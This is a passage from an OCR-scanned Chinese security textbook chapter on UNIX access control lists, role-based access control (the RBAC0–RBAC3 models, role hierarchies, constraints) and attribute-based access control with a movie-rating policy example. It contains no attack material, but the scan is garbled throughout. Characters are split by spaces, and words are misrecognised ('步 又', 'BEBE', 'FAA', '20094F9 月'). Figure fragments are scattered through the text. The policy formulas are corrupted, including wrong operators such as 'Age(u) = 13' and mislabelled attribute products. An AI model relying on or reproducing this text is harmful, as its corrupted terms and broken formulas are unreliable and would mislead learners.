如 果 大 量 不 同 组 的 用 户 需 要 对 不 同文 件 的 一 系列 访问 权 ， 那 就 需要 数目 非常 大 的 组 来 提供 支 
持 。 这 即使 可 行 9， 也 会 很 快 变 得 难于 管理 。 解 决 这 个 问题 的 一 种 办 法 是 使 用 大 多 数 现代 
UNIX 系统 提供 的 访问 控制 表 。 

最 后 一 点 要 指出 的 是 ， 传 统 文件 访问 控制 方案 实现 了 简单 的 保护 域 结 构 。 域 和 用 户 关联 ， 
切换 域 对 应 于 临时 改变 用 户 ID。 


4.4.2 UNIX 中 的 访问 控制 列表 


很 多 现代 UNIX 及 基于 UNIX 的 操作 系统 都 支持 访问 控制 列表 ， 其 中 包括 FreeBSD, 
OpenBSD, Linux 和 Solaris。 本 节 将 描述 FreeBSD 中 的 访问 控制 列表 ， 不 过 其 他 实现 在 本 质 上 
也 具有 相同 的 特征 和 接口 。 这 种 特征 被 称 为 扩展 的 访问 控制 列表 ， 而 传统 UNIX 方法 被 称 为 最 
小 访问 控制 列表 。 

FreeBSD 允许 管理 员 通 过 setfacl 命令 为 文件 分 配 一 个 UNIX 用 户 ID 和 组 的 列表 。 任 何 数 
目的 用 户 和 组 都 可 以 通过 三 个 保护 位 ( 读 、 写 、 执 行 ) 与 文件 关联 ， 这 提供 了 分 配 访问 权 的 
一 种 灵活 机 制 。 文 件 不 是 必须 具有 ACL， 也 可 以 仅 用 传统 的 UNIX 文件 访问 机 制 保护 文件 。 
FreeBSD 文件 包括 一 个 附加 的 保护 位 ， 用 来 指出 文件 是 否 具 有 扩展 的 ACL。 

FreeBSD 和 大 多 数 UNIX 实现 都 支持 扩展 ACL 使 用 下 面 的 策略 (如 图 4-5b 所 示 ): 

1. 9 位 许可 字段 中 的 属 主 类 和 其 他 类 项 目 与 最 小 ACL 中 的 含义 相同 。 

2. 属 组 类 项 目 指定 了 属 组 对 该 文件 的 访问 许可 。 这 些许 可 还 代表 可 以 分 配给 属 主 之 外 的 命 
名 用 户 或 命名 组 的 最 大 访问 许可 。 在 后 一 个 角色 中 ， 属 组 类 项 目 起 到 掩 码 的 作用 。 

3. 附加 的 命名 用 户 和 命名 组 可 以 通过 3 位 许可 字段 与 文件 关联 。 将 命名 用 户 或 命名 组 的 许 
可 与 掩 码 字段 相 比较 ， 任 何不 在 掩 码 字段 中 出 现 的 许可 都 不 被 允许 。 

当 一 个 进程 请 求 访问 文件 系统 对 象 时 ， 需 要 执行 两 个 步 又。 第 一 步 ， 选 择 与 请 求 进程 最 佳 
匹配 的 ACL 项 。ACL 项 按 如 下 顺序 查找 : 属 主 、 命 名 用 户 、 属 组 或 命名 组 、 其 他 用 户 。 仅 由 
其 中 一 项 确定 访问 权 。 第 二 步 ， 检 验 匹 配 项 是 否 包含 足 够 的 许可 。 一 个 进程 可 以 是 多 个 组 的 成 
员 ， 因 此 可 能 与 多 个 组 项 匹配 。 如 果 这 些 匹 配 的 组 项 中 有 一 项 包含 请 求 的 许可 ， 就 从 包含 请 求 
许可 的 项 中 选用 一 项 (不 管 选 用 哪 项 ， 结 果 都 是 相同 的 )。 如 果 匹 配 的 组 项 中 没有 一 项 包含 请 
求 的 许可 ， 则 不 管 选 用 哪 项 ， 访 问 都 将 被 拒绝 。 


4.5 基于 角色 的 访问 控制 


传统 的 DAC 系统 定义 了 单独 的 用 户 和 用 户 组 的 访问 权 。 与 之 相反 ，RBAC 基于 用 户 在 系 
统 中 设 定 的 角色 而 不 是 用 户 的 身份 。 一 般 地 ，RBAC 模型 定义 角色 为 组 织 中 的 一 项 工作 职责 。 
RBAC 系统 给 角色 而 不 是 给 单独 的 用 户 分 配 访问 权 。 反 过 来 ， 用 户 根据 他 们 的 职责 被 静态 地 或 
动态 地 分 配给 不 同 的 角色 。 

RBAC 现 已 得 到 广泛 的 商业 应 用 ， 并 且 依 然 是 一 个 活跃 的 研究 领域 。 美 国 国家 标准 与 技术 


日 KER UNIX 系统 对 用 户 所 属 组 的 最 大 数目 以 及 系统 中 人 允许 的 组 的 总 数 有 硬性 限制 。 
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BEBE (National Institute of Standards and Technology, NIST) 已 经 发 布 一 个 标准 
安全 要 求 (FIPS PUB 140-3, 20094F9 月 )， 要 求 通过 角色 支持 访问 控制 和 管理 。 

用 户 与 角色 的 关系 是 多 对 多 的 ， 角 色 与 资源 或 系统 对 象 的 关系 也 是 多 对 多 的 (图 4-6 )。 在 
某 些 环境 下 ， 用 户 集 改 变频 繁 ， 给 一 个 用 户 分 用户 角色 资源 
配 一 个 或 多 个 角色 的 方案 可 能 也 是 动态 的 。 在 
大 多 数 环境 下 ， 角 色 集 可 能 是 静态 的 ， 仅 有 偶 
尔 的 添加 或 删除 。 每 个 角色 对 一 个 或 多 个 资源 
具有 特定 的 访问 权 。 资 源 集 和 与 某 个 角色 关联 
的 特定 访问 权 也 可 能 很 少 改变 。 

我 们 可 以 用 访问 和 矩阵 来 简单 描述 RBAC 系 
统 中 的 关键 元 素 ， 如 图 4-7 所 示 。 上 面 的 矩阵 
将 单个 用 户 与 角色 联系 起 来 。 一 般 情况 下 用 户 
比 角 色 多 得 多 。 每 个 矩阵 项 或 者 为 空 ， 或 者 被 
标记 ， 后 者 表示 该 用 户 被 分 配给 该 角色 。 注 意 ， 
一 个 用 户 可 以 被 分 配 多 个 角色 (一 行 中 的 标记 
多 于 一 个 )。 下 面 的 矩阵 具有 与 DAC 访问 控制 
和 矩阵 相同 的 结构 ， 其 中 将 角色 作为 主体 。 一 般 
地 ， 角 色 少 而 客体 或 资源 多 。 在 这 个 矩阵 中 ， 
矩阵 项 是 角色 享有 的 特定 访问 权 。 注 意 角 色 也 
可 作为 客体 ， 用 来 定义 角色 层次 。 


密码 模块 





图 4-7 RBAC 的 访问 控制 矩阵 表示 


RBAC 有 助 于 有 效 地 实现 第 1 章 提 到 的 最 小 特权 原则 。 每 个 角色 应 该 包含 其 所 需要 的 访问 
权 的 最 小 集 。 给 用 户 分 配 适 当 的 角色 ， 使 其 仅 能 完成 那个 角色 要 求 的 工作 。 分 配 相同 角色 的 多 
个 用 户 共享 相同 的 访问 权 最 小 集 。 


4.5.1 RBAC 参考 模型 


通用 RBAC 方法 包括 很 多 功能 和 服务 。 为 了 阐述 RBAC 的 各 个 方面 ， 有 必要 定义 关于 
RBAC 功能 性 的 一 组 抽象 模型 。 

[SAND96] 定义 了 一 组 参考 模型 ， 其 已 成 为 正在 进行 的 标准 化 工作 的 基础 。 该 家 族 包括 四 
个 互相 联系 的 模型 ， 如 图 4-8a 和 表 4-3 所 示 。RBAC 包含 RBAC 系统 的 最 小 功能 。RBAC; 包 
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括 RBAC。 的 功能 ， 并 增加 了 角色 层次 ， 使 得 一 个 角色 能 够 继承 另 一 个 角色 的 许可 。RBAC: 包 
括 RBACo， 并 增加 了 约束 ， 来 限制 配置 RBAC 系统 组 件 的 方式 。RBAC; 包含 RBACo、RBAC， 
和 RBAC, 的 所 有 功能 。 

基本 模型 一 一 RBAC。 图 4-8b 除去 角色 层次 和 约束 之 外 的 部 分 ， 包含 RBAC。 系统 中 4 种 
类 型 的 实体 : 

e FAA (user): 访问 该 计算 机 系统 的 个 体 。 每 个 个 体 都 有 一 个 与 之 关联 的 用 户 ID. 

e 角色 (role) : 组 织 内 部 控制 该 计算 机 系统 的 命名 工作 职能 。 一 般 地 ， 与 每 个 角色 关联 
的 是 对 该 角色 及 担任 该 角色 的 任何 用 户 所 被 授予 的 权限 与 职责 的 描述 。 
许可 (permission): 对 一 个 或 多 个 客体 的 特定 访问 模式 的 认可 。 与 访问 权 (access 
right)、 特 权 (privilege) 和 授权 (authorization) 是 同义词 。 

e 会 话 (session): 用 户 与 其 被 分 配 的 角色 集 的 激活 子 集 的 映射 。 

图 4-8b 中 的 实 线 表示 关系 (或 映射 )， 其 上 的 单 箭头 表示 一 ， 双 箭头 表示 多 。 这 样 AP 
与 角色 之 间 是 多 对 多 的 关系 : 一 个 用 户 可 以 有 多 个 角色 ， 多 个 用 户 可 以 被 分 配给 一 个 角色 。 类 
似 地 ， 角 色 与 许可 之 间 也 是 多 对 多 的 关系 。 会 话 用 来 定义 用 户 与 该 用 户 被 分 配 的 一 个 或 多 个 角 
色 之 间 的 一 对 多 的 临时 关系 。 用 户 仅 与 完成 特定 任务 所 必需 的 角色 建立 会 话 。 这 是 最 小 特权 概 
念 的 一 个 实例 。 


RBAC, 
统一 模型 


角色 层次 约束 ” 


RBAC, 
基本 模型 


a) RBAC 模 型 间 的 关系 b) RBAC 模 型 


图 4-8 基于 角色 的 访问 控制 模型 家 族 。RBAC。 是 访问 控制 系统 的 最 低 要 求 ，RBAC 增加 了 
角色 层次 ，RBAC, 增加 了 约束 ，RBAC; 包括 RBAC, 和 RBAC; 


用 户 与 角色 之 间 以 及 角色 与 许可 之 间 的 多 对 多 关系 提供 了 常规 DAC 方案 不 能 实现 的 分 配 
的 灵活 性 与 多 粒度 性 。 没 有 这 种 灵活 性 与 多 粒度 性 ， 就 会 有 更 大 的 风险 ， 因 为 对 被 允许 的 访问 
类 型 的 控制 有 限 ， 用 户 可 能 被 授予 超过 其 需要 的 对 资源 的 访问 权 。NIST RBAC 文档 给 出 了 下 
面 的 例子 : 用 户 可 能 需要 列 出 目录 内 容 ， 修 改 已 存在 的 文件 而 不 创建 新 文件 ， 或 者 他 们 可 能 需 
要 对 文件 追加 记录 而 不 修改 已 存在 的 记录 。 


R 4-3 RBAC 模型 作用 域 
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角色 层次 一 RBAC， 角色 层次 提供 了 一 种 反映 组 织 中 角色 层次 结构 的 方式 。 一 般 地 ， 
责任 越 大 的 工作 岗位 获得 的 访问 资源 的 权 ee 

限 越 多 。 下 级 工作 岗位 的 访问 权 可 能 是 上 

级 岗位 的 一 个 子 集 。 角 色 层 次 利用 继承 的 


项 目 主管 1 项 目 主管 2 

概念 使 得 一 个 角色 能 够 隐 式 地 包含 与 其 下 
级 角色 关联 的 访问 权 。 人 

图 4-9 是 角色 层次 图 的 一 个 例子 。 按 照 工程 师 1 工程 师 1 。 ”工程师 2 工程 师 2 
约定 ， 将 下 级 角色 画 在 下 面 。 两 个 角色 之 
间 的 连 线 表示 上 面 角色 包含 下 面 角色 的 所 ee = 
有 访问 权 及 下 面 角色 不 具有 的 其 他 访问 权 。 
一 个 角色 可 以 从 多 个 下 级 角色 继承 访问 


权 。 例 如 ， 在 图 4-9 中 ， 项 目 主管 Project 
Lead) 角色 包含 生产 工程 师 角色 和 质量 工程 人 
师 角 色 的 所 有 访问 权 。 多 个 角色 也 可 以 继承 同一 个 下 级 角色 。 例 如 ， 生 产 工程 师 角 色 和 质量 工 
程 师 角色 都 包含 工程 师 角 色 的 访问 权 。 此 外 ， 生 产 工 程 师 角色 还 有 其 他 的 访问 权 ， 质 量 工程 师 
角色 也 还 有 另 一 组 不 同 的 访问 权 。 因 而 ， 这 两 种 角色 具有 重合 的 访问 权 ， 也 就 是 它们 与 工程 师 
角色 共享 的 访问 权 。 

约束 一 一 RBAC。 约束 提供 了 一 种 令 RBAC 适应 组 织 中 的 管理 和 安全 策略 细节 的 手段 。 
约束 是 在 角色 之 间 定 义 的 关系 或 与 角色 相关 的 条 件 。[SAND96] 列 出 了 下 面 这 些 类 型 的 约束 : 
互 扩 角色、 基数 和 先决 角色 。 

互 斥 角 色 (mutually exclusive role) 指 一 个 用 户 只 能 被 分 配给 集合 中 的 一 个 角色 。 这 个 限制 
可 以 是 静态 的 ， 也 可 以 是 动态 的 ， 后 者 的 含义 是 在 一 次 会 话 中 一 个 用 户 仅 能 被 分 配给 集合 中 的 
一 个 角色 。 互 斥 约束 支持 一 个 组 织 中 的 职责 和 能 力 的 分 离 。 这 种 分 离 可 以 通过 使 用 同一 集合 上 
的 互 斥 许可 分 配 来 加 强 或 提高 。 连 同 这 个 附加 约束 ， 互 斥 角 色 集 具 有 下 列 性 质 : 

1. 一 个 用 户 ( 在 会 话 中 或 静态 地 ) 只 能 被 分 配给 集合 中 的 一 个 角色 。 

2. 任何 许可 (访问 权 ) 只 能 被 授予 给 集合 中 的 一 个 角色 。 

因而 互 斥 角色 集 具 有 不 重 释 的 许可 。 如 果 两 个 用 户 被 分 配给 集合 中 的 不 同 角色 ， 那 么 用 户 
担任 这 些 角 色 时 具有 不 重合 的 许可 。 互 斥 角色 的 目的 是 增加 具有 不 同 能 力 、 不 同 工 作 职责 的 个 
体 勾 结 起 来 破坏 安全 策略 的 难度 。 

基数 (cardinality) 指 设置 关于 角色 的 最 大 数值 。 这 种 类 型 的 一 个 约束 是 设置 可 以 分 配给 一 
个 指定 角色 的 最 大 用 户 数 。 例 如 ， 项 目 主管 角色 或 部 门 总 监 角色 一 般 被 限制 于 一 个 用 户 。 系 统 
也 可 以 强制 约束 一 个 用 户 可 以 被 分 配 到 的 角色 数 ， 或 者 一 个 用 户 在 一 次 会 话 中 可 以 被 激活 的 角 
色 数 。 另 一 种 形式 的 约束 是 设 定 可 以 被 授予 某 个 特定 许可 的 最 大 角色 数 ， 这 对 于 敏感 或 功能 强 
大 的 许可 是 很 有 意义 的 。 

系统 还 可 以 指定 先决 条 件 (prerequisite)， 用 来 规定 [0] 如 果 已 被 分 配给 另 一 个 指定 角色 时 ， 
用 户 只 能 被 分 配 一 个 特定 角色 。 先 决 条 件 可 以 用 来 构建 最 小 特权 概念 的 实现 。 在 一 个 层次 中 ， 
可 以 要 求 用 户 仅 当 已 被 分 配 直接 下 级 (低级 ) 角色 ， 才 能 被 分 配 上 级 (高 级 ) 角色 。 例 如 ， 在 
图 4-9 中 ， 被 分 配 了 项 目 主管 角色 的 用 户 必须 也 被 分 配 下 级 的 生产 工程 师 和 质量 工程 师 角 色 。 
这 样 ， 如 果 用 户 在 一 个 指定 任务 中 不 需要 项 目 主 管 角 色 的 全 部 许可 ， 他 可 以 调用 会 话 来 使 用 仅 
仅 需 要 的 下 级 角色 。 注 意 ， 要 使 用 层次 概念 的 先决 条 件 ， 必 须 采 用 RBAC; 模型 。 
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46 ”基于 属性 的 访问 控制 


访问 控制 技术 的 一 项 较 新 的 进展 是 基于 属性 的 访问 控制 ( Attribute-Based Access Control, 
ABAC) 模型 。ABAC 模型 能 够 定义 表达 资源 和 主体 二 者 属性 条 件 的 授权 。 例 如 ， 考 虑 这 样 一 
种 配置 ， 其 中 每 个 资源 都 具有 一 个 属性 ， 用 以 标识 创建 该 资源 的 主体 。 然 后 ， 用 单一 的 访问 
规则 来 指定 每 一 个 资源 的 所 有 创建 者 的 所 有 者 特权 。ABAC 方法 的 优势 在 于 它 的 灵活 性 以 及 
表达 能 力 。[PLAT13] 指出 ABAC 应 用 于 真实 系统 的 主要 障碍 是 ， 需 要 考虑 每 次 访问 对 资源 和 
用 户 属性 的 评价 所 造成 的 性 能 影响 。 然 而 ， 对 于 某 些 应 用 诸如 Web 服务 和 云 计 算 的 综合 运用 ， 
每 次 访问 所 增加 的 性 能 代价 相对 于 本 已 相当 高 的 性 能 代价 是 微不足道 的 。 因 而 ，Web 服务 是 
实现 ABAC 模型 的 开创 性 技术 ， 尤 其 是 引入 了 可 扩展 的 访问 控制 标记 语言 (eXtensible Access 
Control Markup Language，XACML) [BECU13]， 并 且 也 有 人 对 将 ABAC 模型 应 用 到 云 服务 表 
现 出 相当 大 的 兴趣 [IQBA12,YANG12]。 

ABAC 模型 有 三 个 关键 要 素 : 属性 ， 为 配置 中 的 实体 而 定义 ; 策略 模型 ， 定 义 ABACK 
略 ; 以 及 架构 模型 ， 应 用 于 实施 访问 控制 的 策略 。 我 们 将 依次 研究 这 些 要 素 。 


4.6.1 属性 


属性 用 来 定义 主体 、 客 体 、 环 境 条 件 或 机 构 预定 义 且 预 分 派 的 要 求 操作 的 特定 方面 的 特 
征 。 属 性 包含 的 信息 表明 了 由 属性 所 提供 的 类 别 信息 、 属 性 名 称 和 属性 值 (例如 ，Class = 
Hospital RecordsAccess, Name = PatientInformationAccess, Value = MFBusinessHoursOnly)。 

下 面 是 ABAC 模型 中 属性 的 三 种 类 型 . 

e 主体 属性 : 主体 是 一 个 主动 的 实体 (如 用 户 、 应 用 、 进 程 或 设备 )， 能 引起 客体 间 的 信 

息 流 动 或 者 系统 状态 的 改变 。 每 个 主体 都 有 能 够 定义 其 身份 和 特征 的 关联 属性 。 这 些 
属性 可 以 包含 主体 的 标识 符 、 名 称 、 组 织 、 职 务 等 。 主 体 的 角色 也 可 被 视 为 一 项 属性 。 

e SARE: 客体 ， 也 被 称 为 资源 ， 是 一 个 〈 在 给 定 请 求 的 语 境 中 ) 被 动 的 包含 或 接收 信 

息 的 与 信息 系统 相关 的 实体 (如 设备 、 文 件 、 记 录 、 表 、 进 程 、 程 序 、 网 络 、 域 )。 与 
主体 一 样 ， 客 体 具 有 可 以 用 来 制定 访问 控制 决策 的 属性 。 例 如 ， 一 份 Microsoft Word 
文档 ， 可 以 具有 诸如 标题 、 主 题 、 日 期 和 作者 之 类 的 属性 。 客 体 属性 也 常常 从 客体 元 
数据 中 提取 。 尤 其 是 ， 各 种 各 样 的 Web 服务 的 元 数据 属性 可 能 会 和 访问 控制 的 目的 相 
关 ， 比 如 所 有 权 、 服 务 分 类 法 甚至 服务 质量 (Qos) 属性 。 

e 环境 属性 : 这 类 属性 到 目前 为 止 ， 在 很 大 程度 上 被 大 多 数 访问 控制 规则 所 忽视 。 它 们 
描述 了 信息 访问 发 生 时 所 处 的 运行 的 、 技 术 的 甚至 态势 的 环境 或 情境 。 例 如 ， 当 前 日 
期 与 时 间 、 当 前 病毒 /黑客 活动 、 网 络 安全 级 别 (如 因特网 与 内 联网 的 比较 ) 等 属性 并 
不 与 某 个 特定 的 主体 或 资源 相关 联 ， 但 或 许 会 与 应 用 访问 控制 策略 相关 。 

ABAC 是 一 种 可 以 区 别 的 逻辑 访问 控制 模型 ， 因 为 它 通过 对 实体 (主体 和 客体 ) 属性 、 操 
作 及 与 请 求 相关 的 环境 的 评价 规则 来 控制 对 客体 的 访问 。ABAC 依赖 于 对 给 定 环境 中 的 主体 属 
性 、 客 体 属 性 以 及 定义 主客 体 属 性 组 合 所 允许 操作 的 形式 化 联系 或 访问 控制 规则 的 评价 。 所 有 
的 ABAC 解决 方案 包含 这 些 基础 的 核心 能 力 ， 以 评价 属性 并 执行 规则 或 者 这 些 属性 间 的 联系 。 
ABAC 系统 能 够 实现 DAC、RBAC 和 MAC 的 思想 。ABAC 能 够 实现 细 粒 度 的 访问 控制 ， 允 
许 更 大 规模 的 离散 式 输入 进入 访问 控制 决策 ， 并 且 提 供 更 大 的 可 能 的 变量 组 合集 合 ， 以 此 来 反 
映 更 大 且 更 明确 的 可 能 规则 、 策 略 或 访问 限制 的 集合 。 因 此 ，ABAC 允许 无 限 数 量 的 属性 组 合 
起 来 以 满足 任何 访问 控制 规则 。 此 外 ，ABAC 系统 还 能 通过 充分 发 挥 ABAC 灵活 性 的 高 级 表 
达 策 略 模型 ， 来 满足 来 自 基 本 访问 控制 列表 的 各 种 各 样 的 要 求 。 


BAF BIER 95 


4.6.2 ABAC 逻辑 架构 

图 4-10 说 明了 ABAC 系统 的 基本 组 件 的 逻辑 架构 。 主 体 对 客体 的 一 次 访问 将 遵循 下 列 步 
又 进行 : 

1. 主体 向 客体 提出 访问 请 求 。 该 请 求 被 路 由 到 一 个 访问 控制 装置 。 

2. 该 访问 控制 装置 通过 一 组 由 预先 配置 的 访问 控制 策略 所 定义 的 规则 ( 2a) 进行 控制 。 基 
于 这 些 规 则 ， 访 问 控制 装置 对 主体 ( 2b)、 客 体 ( 2c) 和 当前 环境 条 件 ( 2d) 的 属性 进行 评估 ， 
决定 是 否 授权 。 

3. 若 访问 获得 授权 ， 则 访问 控制 机 制 授权 主体 访问 客体 ; 若 访问 未 被 授权 ， 则 拒绝 访问 。 


访问 控制 策略 


环境 条 件 


2a 





xe i, 
2b we 


rai 






主体 属性 客体 属性 
图 4-10 简单 的 ABAC 情景 


从 上 述 逻 辑 架 构 中 可 以 清楚 地 看 到 ， 访 问 控制 决策 由 四 个 彼此 独立 的 信息 源 决 定 。 系 统 设 
计 者 可 以 决定 ， 对 于 涉及 主体 、 客 体 和 环境 条 件 的 访问 控制 来 说 ， 哪 些 属性 是 重要 的 。 接 着 ， 
系统 设计 者 或 其 他 机 构 就 能 够 以 规则 的 形式 对 主体 、 客 体 和 环境 条 件 的 任何 可 能 的 属性 组 合 定 
义 访 问 控制 策略 。 显 然 这 种 方法 非常 有 效 并 且 灵 活 。 然 而 ， 它 的 成 本 ， 无 论 是 在 设计 与 实现 的 
复杂 度 方面 ， 还 是 在 性 能 影响 方面 ， 都 很 可 能 超过 其 他 访问 控制 方式 。 这 是 系统 运行 单位 所 必 
须 进 行 的 权衡 。 

图 4-11 (摘自 NIST SP 800-162[HU13]) 提供 了 一 种 实用 的 方法 来 理解 ABAC 模型 与 采 
用 访问 控制 列表 (ACL) 的 DAC 模型 的 范围 的 比较 。 该 图 不 仅 说 明了 这 两 种 模型 的 相对 复杂 
度 ， 还 阐明 了 这 两 种 模型 的 信任 要 求 。 通 过 对 于 ACL 和 ABAC 分 别 采用 的 有 代表 性 的 信任 关 
系 ( 用 箭头 线 表 示 ) 的 比较 表明 ， 要 想 ABAC 正常 工作 ， 需 要 许多 更 加 复杂 的 信任 关系 。 忽 略 
图 4-11 两 个 部 分 的 共性 内 容 ， 我 们 可 以 观察 到 ，ACL 中 的 信任 根 在 于 客体 拥有 者 ， 他 通过 向 
ACL 添加 用 户 来 提供 对 客体 的 访问 从 而 最 终 实 现 客体 访问 规则 。 而 在 ABAC 中 ， 信 任 根来 自 
于 客体 拥有 者 没有 控制 权 的 很 多 方面 ， 比 如 主体 属性 机 构 、 策 略 开发 者 和 凭证 发 放 者 。 因 此 ， 
SP 800-162 建议 ， 应 该 组 建 一 个 企业 治理 实体 来 管理 所 有 身份 、 和 凭证、 访问 管理 能 力 的 部 署 和 
运行 ， 且 每 个 下 级 组 织 应 该 维护 一 个 相似 的 实体 ， 以 确保 在 管理 与 企业 实施 ABAC 相关 的 部 
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署 和 范式 转移 方面 的 一 致 性 。 另 外 ， 它 还 建议 企业 开发 一 个 信任 模型 ， 用 来 说 明 信 任 关系 并 帮 
助 确定 信息 和 服务 的 所 有 权 和 责任 、 对 额外 的 策略 和 治理 的 需要 以 及 对 用 来 确认 或 实施 信任 关 
系 的 技术 解决 方案 的 要 求 。 信 任 模型 可 以 用 来 帮助 说 服 组 织 在 对 信息 如 何 使 用 与 保护 有 明确 预 
期 的 情况 下 分 享 信息 ， 还 可 以 用 来 信任 来 自 其 他 组 织 的 信息 、 属 性 和 授权 断言 。 


恰当 猿 证 发 放 rere 





b) ABAC 信 任 链 
4-11 ACL 和 ABAC 的 信任 关系 


4.6.3 ABAC 策略 


策略 (policy) 是 一 组 用 来 管理 组 织 内 部 的 允许 行为 的 规则 和 关系 ， 其 基础 是 主体 所 具有 
的 特权 ， 以 及 在 哪 种 环境 条 件 下 资源 或 客体 需要 被 保护 。 反 过 来 ， 特 权 (privilege) 代表 主体 
的 授权 行为 ; 它们 由 机 构 定义 并 体现 在 策略 中 。 其 他 常用 来 代替 特权 的 术语 有 权利 (right)、 授 
权 (authorization) 和 资格 (entitlement)。 策 略 通常 是 从 需要 保护 的 客体 以 及 主体 可 用 的 特权 和 角 
度 编写 的 。 

现在 我 们 定义 一 个 ABAC 策略 模型 ， 此 模型 基于 [YUAN05] 中 提出 的 模型 。 我 们 使 用 如 
下 约定 : 

1. S、O 和 了 分 别 代表 主体 、 客 体 和 环境 ; 
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2. SA (1<k<K), OAn (1<Sm<M) AEA, (1Sn<N) 分 别 是 预先 定义 的 主体 、 客 体 和 
环境 的 属性 ; 
3. ATTR(s), ATTR(o) 和 ATTR(e) 分 别 是 主体 s、 客 体 o 和 环境 e 的 属性 赋值 关系 : 


ATTR (s) C SA; x SA2 Meh SAk 
ATTR(r) C OA, x OA2 x ... x OAy 
ATTR(o) C EA, x EA, x ... x EAy 


表达 式 存在 问题 ， 变 量 分 别 为 9，o，e。 
我 们 也 采用 函数 记 法 来 表示 对 单一 属性 的 赋值 。 例 如 : 


Role(s) = “Service Consumer” 
ServiceOwner(o) = “XYZ, Inc.” 
CurrentDate(e) = “01-23-2005” 


4. 在 大 多 数 情况 中 ， 确 定 在 特定 环境 e PEK s 是 否 能 够 访问 客体 o 的 策略 规则 ， 是 属性 
s、0 和 e 的 布尔 函数 : 


Rule: can_access (s, O, e) e f(ATTR(s), ATTR(o), ATTR(e)) 


给 定 所 有 属性 s、o Mle 的 赋值 ， 如 果 函 数值 为 真 ， 则 授权 访问 资源 ; 否则 ， 拒 绝 访问 。 

5. 一 个 策略 规则 库 或 者 策略 存储 区 可 以 组 成 大 量 策略 规则 ， 覆 盖 安全 域内 的 很 多 主体 和 客 
体 。 访问 控制 决策 进程 本 质 上 相当 于 对 策略 存储 区 中 的 适用 策略 规则 的 评价 。 

现在 我 们 考虑 一 个 网 上 娱乐 商店 的 例子 ， 该 商店 向 用 户 提供 流 式 电影 并 收取 包月 费 。 我 们 
用 这 个 例子 来 对 RBAC 和 ABAC 方法 进行 对 比 。 该 商店 必须 实施 下 列 基于 用 户 年 龄 和 电影 内 
容 评级 的 访问 控制 规则 : 


电影 评级 允许 访问 的 用 户 
R 17 岁 及 以 上 
PG-13 13 岁 及 以 上 
G 任何 人 


在 RBAC 模型 中 ， 每 位 用 户 往往 在 注册 时 被 分 配 到 成 年 、 未 成 年 或 儿童 三 种 角色 中 的 其 
中 一 种 。 与 此 对 应 将 创建 三 种 许可 : 可 以 观看 R 级 电影 ; WA RG-13 级 电影 ;可 以 观看 
G 级 电影 。 成 年 角色 获得 所 有 三 种 许可 ， 未 成 年 角色 获得 观看 PG-13 级 电影 和 G 级 电影 的 许 
可 ,而 儿童 角色 只 能 获得 观看 G 级 电影 的 许可 。 用 户 到 角色 的 分 派 和 许可 到 角色 的 分 派 都 需 
要 人 工 管理 。 

该 应 用 的 ABAC 方法 则 并 不 需要 显 式 定义 角色 。 相 反 ， 用 户 u 是 否 能 够 访问 或 观看 电影 
m (此 处 忽略 了 安全 环境 e) 将 通过 评价 如 下 策略 规则 来 决定 : 


Rl:can_access(u, m, e) < 
(Age(u) > 17 A Rating(m) E {R, PG-13, G}) V 
(Age(u) = 13 A Age(u) < 17 A Rating(m) € {PG-13, G}) Vv 
(Age(u) < 13 A Rating(m) E {G}) 


其 中 年 龄 和 评级 分 别 是 主体 和 客体 的 属性 。 这 里 展示 的 ABAC 模型 的 优势 在 于 它 消 除了 对 着 
态 角 色 的 定义 和 管理 ， 从 而 消除 了 对 用 户 到 角色 的 分 派 及 许可 到 角色 的 分 派 所 需 的 管理 工作 。 
当 我 们 执行 细 粒 度 策略 时 ，ABAC 的 优势 将 更 加 显而易见 。 例 如 ,假设 根 据 电 影 的 发 行 日 
期 与 当前 日 期 的 距离 ， 把 电影 分 为 新 片 和 老 片 两 类 ; 同时 依据 用 户 的 付费 模式 将 用 户 分 为 高 级 
用 户 和 普通 用 户 两 类 。 我 们 将 执行 一 项 策略 ， 只 有 高 级 用 户 能 够 观看 新 片 。 而 对 于 RBAC 模 
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式 ， 我 们 必须 把 角色 的 数量 翻 倍 ， 从 而 才能 够 把 用 户 按照 年 龄 和 付费 模式 进行 区 分 ， 相 应 地 也 
要 把 许可 的 数量 翻 倍 。 

一 般 地 ， 如 果 有 天 个 主体 属性 和 M 个 客体 属性 ， 并 且 对 每 个 属性 ，Range() 表示 属性 可 能 
取 值 的 范围 ， 那 么 RBAC 模型 所 需要 的 角色 和 许可 的 数量 分 别 是 : 


K M 
[[ Range(sa,) and |] Range(sa,) 
k=1 m=] 


因而 我 们 可 以 看 到 ， 随 着 属性 数量 为 满足 细 粒 度 策略 而 逐步 增加 ， 角 色 和 许可 的 数量 将 按 
照 指数 方式 增长 。 相 反 地 ,ABAC 模型 却 以 一 种 高 效 的 方式 来 处 理 额 外 的 属性 。 在 上 述 例子 中 ， 
预先 定义 的 策略 R 仍然 适用 。 我 们 需要 定义 两 条 新 的 规则 : 


R2: can access (u, m，，e) 一 
(MembershipType(u) = Premium) V 
(MembershipType(u) = Regular A MovieType(m) = OldRelease) 
R3: can_access(u, m, e)-R1 A R2 


使 用 ABAC 模型 ， 增 加 环境 属性 也 非常 简单 。 假 设 我 们 希望 添加 一 条 新 规则 ， 表 述 如 下 : 
普通 用 户 可 在 促销 期 间 观 看 新 电影 。 这 很 难 用 RBAC 模型 表达 。 但 在 ABAC 模型 中 ， 我 们 只 
需要 增加 一 条 合 取 (AND) 规则 ， 来 检查 环境 属性 “当前 日 期 ”是 否 处 于 促销 期 中 。 
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现在 我 们 研究 一 种 以 属性 为 中 心 的 访问 控制 方法 所 涉及 的 一 些 概念 。 本 节 主 要 对 身份 、 凭 
证 和 访问 管理 (CAM) 的 概念 进行 概述 ，4.8 节 将 探讨 使 用 信任 框架 来 交换 属性 。 
ICAM 是 一 种 用 来 管理 和 实现 数字 身份 (及 相关 属性 )、 和 凭证 和 访问 控制 的 综合 性 方法 。 
ICAM 由 美国 政府 开发 ， 但 其 并 非 仅 适用 于 政府 机 构 ， 还 可 以 由 寻求 访问 控制 统一 方法 的 企业 
来 部 署 。ICAM SE: 
© 创建 个 体 以 及 ICAM 文件 中 所 谓 的 “ 非 人 实体 (NPE)” 的 可 信 数 字 身 份 表示 。 后 者 包 
括 寻 求 资源 访问 许可 的 进程 、 应 用 程序 和 自动 化 设备 。 

© 将 这 些 身份 绑 定 到 可 能 为 个 体 或 NPE 提供 访问 交易 代理 的 凭证 。 和 凭证 是 一 个 对 象 或 数 
据 结 构 ， 将 身份 (及 可 选 的 附加 属性 ) 权威 地 绑 定 到 用 户 所 拥有 并 控制 的 权 标 。 

o 使 用 凭证 对 机 构 资源 提供 授权 访问 。 

